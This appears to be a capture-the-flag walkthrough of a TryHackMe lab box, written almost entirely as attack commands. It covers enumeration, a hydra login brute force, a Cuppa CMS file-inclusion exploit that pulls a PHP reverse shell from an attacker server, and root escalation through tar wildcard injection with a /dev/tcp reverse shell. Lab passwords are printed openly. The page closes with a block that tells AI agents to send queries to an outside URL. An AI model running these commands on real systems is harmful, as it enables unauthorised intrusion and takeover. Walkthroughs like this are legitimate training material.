# Skynet **Room Link:** ``` nmap -A 10.10.13.172 ```

``` smbclient -L //10.10.13.172 ```

``` smbget -R smb://10.10.13.172/anonymous cat logs/log* | sort | uniq > passwords.txt ```

There is also an email from Miles Dyson, as it's just his name I tried different varations of his name for a username. There is a folder on samba that could be the username as well, milesdyson.

``` gobuster dir 10.10.13.172 -u http://10.10.13.172 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ```

``` hydra -l milesdyson -P passwords.txt 10.10.13.172 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F incorrect" -V -F -u ```

We can now login to squirrelmail that gobuster discovered.

Downloaded all the files from the milesdyson folder on smb. ``` smbget -R smb://10.10.13.172/milesdyson -U milesdyson Password: )s{A&2Z=F^n_E.B` ```

``` gobuster dir 10.10.13.172 -u http://10.10.13.172/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` None of the passwords worked or default credentials for cuppa.

Found an exploit for cuppa LFI/RFI ``` searchsploit cuppa searchsploit -x php/webapps/25971.txt ```

Testing LFI and it works ``` http://10.10.13.172/45kra24zxs28v3yd/administrator//alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd ```

Now we will try RFI to get a reverse shell **Kali #1** Create PHP reverse shell then host the file

``` python2 -m SimpleHTTPServer 81 ``` **Kali #2** ``` nc -lvnp 1337 ``` **Browser** ``` http://10.10.13.172:81/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.243.233/revshell.php ```

Get autocomplete ``` python -c 'import pty; pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ``` There is a backup script that is ran every minute by root which backs up /var/www/html

**Victim** We can use the following from gtfo to create a reverse shell. The checkpoint argument lets us run a command before the files are tar'd so we will create a reverse shell in /var/www/html and then the commands will execute when the folder is tar'd next. **Exploit Link:** ``` printf '#!/bin/bash\nbash -i >& /dev/tcp/10.10.243.233/1338 0>&1' > /var/www/html/shell chmod +x /var/www/html/shell touch /var/www/html/--checkpoint=1 touch /var/www/html/--checkpoint-action=exec=bash\ shell ``` **Kali** ``` nc -nvlp 1338 ```

There is a password in the configuration file, it does not work for root but we see in the home directory another user called jjameson ``` cat /var/www/html/configuration.php ```

We can login as jjameson ``` su jjameson Password: nv5uz9r3ZEDzVjNu ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/skynet.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.